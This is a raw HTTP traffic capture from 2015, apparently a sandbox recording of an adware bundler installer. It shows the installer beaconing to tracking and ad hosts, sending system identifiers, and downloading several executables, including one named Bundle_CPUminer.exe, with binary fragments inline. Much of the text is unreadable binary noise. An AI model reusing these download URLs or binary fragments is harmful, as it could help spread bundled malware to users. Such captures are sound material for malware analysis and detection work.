w2pdU46GJa3KDXzCavBx239nuW7huTf2OdQS1NUcnlcIYx6tZPlVDesZJ5XsiHLj94r/m/irHYGadrVVH7D8w/FfG9S4pZp9slaSf jurUo261gSav34DXisBPLyKJuv0o/D81dvimS01xElAGWk9eUT6uBV2YAtEkO rJ lWx1mFFNZjvvaN9gJ4crwFhVEjHZaBzJruhN1YGlqKyH1GH zVE/8kuFhiLm2lfSgxrrsgP5sdYyIubXXZR n4STfbQ56POlGbe8vFcgI7tJhJbQaZLRs4lbk8lka8rw6uDVhtUEMldD4nBSsrsv3FuFvEcjsbhcqF23ANzP2g wQ7fMwrJJp1kcc2fGPiT K0dzr sfQC6Oc6WNIWMZdThDhVASoD lHz0xJPaX1ZQaKudDDAxA/8bhJNX8fx5yYX1yfw/cf2zNQXe1Jhbih3MDZfetND6Ck
<<< skipped >>>
GET /installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 3qzWs1YQAxm3PbDM seb8 haDV84wLHuBDXL1XYkebEaXx/RIyoxbI/FiuwlHSQZ
x-amz-request-id: 28E2E6E1A27C27A1
Date: Fri, 25 Sep 2015 22:45:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3qzWs1YQAxm3PbDM seb8 haDV84wLHuBDXL1XYkebEaXx/RIyoxbI/FiuwlHSQZ..x-amz-request-id: 28E2E6E1A27C27A1..Date: Fri, 25 Sep 2015 22:45:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40692
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221126.cds036.fr7.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=346a2c6645c6ec5865e603ca985dd203&_srvlog=NSI &browser=un&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221160&ts=1443221159&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsx1C.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 22:45:59 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Fri, 25 Sep 2015 22:45:59 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:33 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=02C3E07DDD974541923F9A204A02BCBB; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=02C3E07DDD974541923F9A204A02BCBB,1443221193.0778; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:18 GMT
Server: Apache/2.2.16
Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT
ETag: "6a201e5-586f10-520941b404a00"
Accept-Ranges: bytes
Content-Length: 5795600
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0........X..........@..............................P.......(........... cX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40706
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221125.cds002.fr7.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:32 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=B171EA1CF77849208BC80261E6F3609C; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=B171EA1CF77849208BC80261E6F3609C,1443221192.82824; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 HTTP/1.1
Host: VVV.djapp.info
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 25 Sep 2015 22:49:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Fri, 25 Sep 2015 22:49:07 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe..0..
GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:24 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443221125.dop009.fr7.t,1443221124.cds054.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 22:45:24 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1443221125.dop009.fr7.t,1443221124.cds054.fr7.c..GIF89a.............,...........D..;..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:32 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=F478925BDE4F41C79B195A6D4C6D4251; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F478925BDE4F41C79B195A6D4C6D4251,1443221192.55363; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:24 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 22:45:24 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 48674
Connection: keep-alive
Date: Fri, 25 Sep 2015 21:06:28 GMT
Last-Modified: Fri, 25 Sep 2015 21:00:41 GMT
ETag: "67eda82fc3df3349df44916f6efe55bf"
Accept-Ranges: bytes
Server: AmazonS3
Age: 5913
X-Cache: Hit from cloudfront
Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lVe1RAX7En0exaLRnFCbt2haXzmhex7aTh3j-d_Zez-YUHKanNryuQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata...`...@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441897175"
Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT
Cache-Control: max-age=28023
Content-Length: 104395
Content-Type: application/octet-stream
X-HW: 1443221168.dop008.fr7.t,1443221167.cds004.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:21 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=3384
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1443221122.dop003.fr7.t,1443221121.cds030.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 74893
Connection: keep-alive
Date: Fri, 25 Sep 2015 21:38:00 GMT
Last-Modified: Fri, 25 Sep 2015 21:31:39 GMT
ETag: "1f71f441cb13035d10d8b6979a628dda"
Accept-Ranges: bytes
Server: AmazonS3
Age: 4055
X-Cache: Hit from cloudfront
Via: 1.1 7ab285f149f01a2b05c04a9ee64a602f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TgrYDqhWJTlMIUXS8c_f99kD9zNetFl5j31Esoi9vMmZvh16ri29-w==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................p...............................................t.......`...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...p...............................rsrc........`.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40706
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop011.fr7.t,1443221125.cds004.fr7.c
.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 91074
Connection: keep-alive
Date: Thu, 24 Sep 2015 23:30:47 GMT
Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT
ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"
Accept-Ranges: bytes
Server: AmazonS3
Age: 83711
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gQTiec42-3YzniXrS_fdTXZmADEMUnkx0f7a5o3wGnPURx7di0cqbQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................)..............................................t........)..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata....&..............................rsrc.........)......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:57 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1442816573"
Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT
Cache-Control: max-age=28161
Content-Length: 104354
Content-Type: application/octet-stream
X-HW: 1443221158.dop001.fr7.t,1443221157.cds007.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t 